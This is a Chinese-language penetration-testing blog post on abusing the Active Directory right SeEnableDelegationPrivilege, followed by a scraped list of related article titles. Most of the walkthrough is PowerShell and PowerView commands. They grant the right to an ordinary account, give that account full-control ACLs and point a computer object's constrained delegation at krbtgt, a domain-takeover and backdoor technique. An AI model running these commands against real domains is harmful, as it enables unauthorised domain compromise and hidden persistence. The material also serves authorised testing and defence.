文章目录

1. 前言
2. SeEnableDelegationPrivilege权限的拥有者是谁？
- 1. 通过powerview
- 2. 通过GPO
- 3.通过UserRights（只在域控上执行有效）
3. 如何给其他用户配置SeEnableDelegationPrivilege权限
4.如何利用拥有SeEnableDelegationPrivilege权限的普通用户
参考文章

1. 前言

SeEnableDelegationPrivilege权限的作用是配置约束性委派。拥有SeEnableDelegationPrivilege权限的人可以配置任意一台主机的约束性委派，但这个权限一般情况下只有域控才有，如果在渗透过程中控制一个拥有SeEnableDelegationPrivilege权限的账户，那基本约等于控制了整个域。

2. SeEnableDelegationPrivilege权限的拥有者是谁？

1. 通过powerview

以下命令需要导入powerview：

Set-ExecutionPolicy Bypass -Scope Process
. ./powerview.ps1
Get-DomainPolicy -Source DC
#看privilegerights的最后一项确定sid为S-1-5-32-544
"S-1-5-32-544"|Convert-SidToName

2. 通过GPO

Get-DomainPolicy -Source DC
type "\\test.com\sysvol\test.com\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf"
"S-1-5-32-544"|Convert-SidToName

第一条命令得到path的值，用第二条命令读path所指定的文件，看最后一行，确定sid后跟第一步使用"S-1-5-32-544"|Convert-SidToName来获取sid对应的用户：

3.通过UserRights（只在域控上执行有效）

下载地址：https://github.com/shanfenglan/test

Set-ExecutionPolicy Bypass -Scope Process
Import-Module .\UserRights.psm1
Get-AccountsWithUserRight -right SeEnableDelegationPrivilege

3. 如何给其他用户配置SeEnableDelegationPrivilege权限

需要导入userrights

Grant-UserRight -Account zhangsan -Right SeEnableDelegationPrivilege
Get-AccountsWithUserRight -Right SeEnableDelegationPrivilege

给zhangsan账号添加一个任意的spn：

setspn -s test/zhangsan zhangsan

设置zhangsan账号对整个域的完全控制权限：

Add-DomainObjectAcl -TargetIdentity zhangsan -PrincipalIdentity zhangsan -Rights All

验证：

Get-DomainObjectAcl | ?{$_.SecurityIdentifier -match "S-1-5-21-3763276348-88739081-2848684050-1110"} | select objectdn,ActiveDirectoryRights

更新组策略：gpupdate /force

以上四步缺一不可

setspn -U zhangsan #查询zhangsan的spn

4.如何利用拥有SeEnableDelegationPrivilege权限的普通用户

先导入powerview跟userrights

1.查询已有的配置了约束性委派的机器
发现没有配置。

Get-DomainComputer -TrustedToAuth -Domain test.com -Properties distinguishedname,useraccountcontrol,msds-allowedtodelegateto

2.确定当前用户具有SeEnableDelegationPrivilege权限

whoami /all
Get-DomainPolicy -Source DC
type "\\test.com\sysvol\test.com\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf"

对比后发现当前用户的sid在SeEnableDelegationPrivilege的值中。

3.利用当前用户的权限配置主机的约束性委派

Set-ExecutionPolicy Bypass -Scope Process
. ./powerview.ps1
Get-ADObject -Identity "evilsystem" | Set-ADObject -Set @{ "msDS-AllowedToDelegateTo"=("krbtgt/test.com")}

参考文章

域渗透——SeEnableDelegationPrivilege的利用
那些从未听过的高危用户权限
Windows内网协议学习LDAP篇之域权限下
一种深度隐秘的域后门方式

SeEnableDelegationPrivilege权限的利用相关推荐

[导入]对iis写权限的利用
对iis写权限的利用文章来源:http://blog.csdn.net/21aspnet/archive/2004/11/04/167374.aspx 转载于:https://www.cnblogs ...
[WCF权限控制]利用WCF自定义授权模式提供当前Principal[实例篇]
在<原理篇>中我们谈到:如果采用自定义安全主体权限模式,我们可以通过自定义AuthorizationPolicy或者ServiceAuthorizationManager实现对基于当前认证 ...
[WCF权限控制]利用WCF自定义授权模式提供当前Principal[原理篇]
在<通过扩展自行实现服务授权>一文中,我通过自定义CallContextInitializer的方式在操作方法之前之前根据认证用户设置了当前线程的安全主体,从而实现授权的目的.实际上,WC ...
对iis写权限的利用
作者:未知请作者速与本人联系大家可能看过<远程分析IIS设置>,里面对iis的各种设置进行了分析,我这里就对iis的写权限来分析下,以下引用<远程分析IIS设置>文章对i ...
**[权限控制] 利用CI钩子实现权限认证
http://codeigniter.org.cn/forums/thread-10877-1-1.html 一直没找到CI的权限认证扩展,以前好像找到过一个老外的扩展,不过不怎么好用,现在记不清了, ...
python共享文件权限_利用Python实现在同一网络中的本地文件共享方法
本文利用Python3启动简单的HTTP服务器,以实现在同一网络中共享本地文件. 启动HTTP服务器打开终端,转入目标文件所在文件夹,键入以下命令: $ cd /Users/zero/Documen ...
NTFS文件服务器存储权限配置,利用NTFS权限管理数据，要设置文件或文件夹的权限，必须是管理员...
在NTFS磁盘中,Windows Server 2012 R2操作系统会自动设置默认的权限值,并且这些权限会被其子文件夹和文件所继承.为了控制用户对某个文件夹以及该文件夹中的文件和子文件夹的访问,就需 ...
设置访问权限_CentOS7利用Firewall对PostgreSQL设置安全的访问权限
最近新上了一台PostgreSQL数据库服务器,研发提出了部分建议: 所有开发人员只能访问PostgreSQL数据库,不能远程ssh登录该数据库服务器 DBA组的成员可以ssh访问PostgreSQL ...
windows九大权限的分析与利用
文章目录 1.前言 2.常见的权限集合可被进一步利用的权限 3.补充:权限的状态到底有什么意义 4.利用 4.1 SeImpersonatePrivilege 4.2 SeAssignPrimary ...

SeEnableDelegationPrivilege权限的利用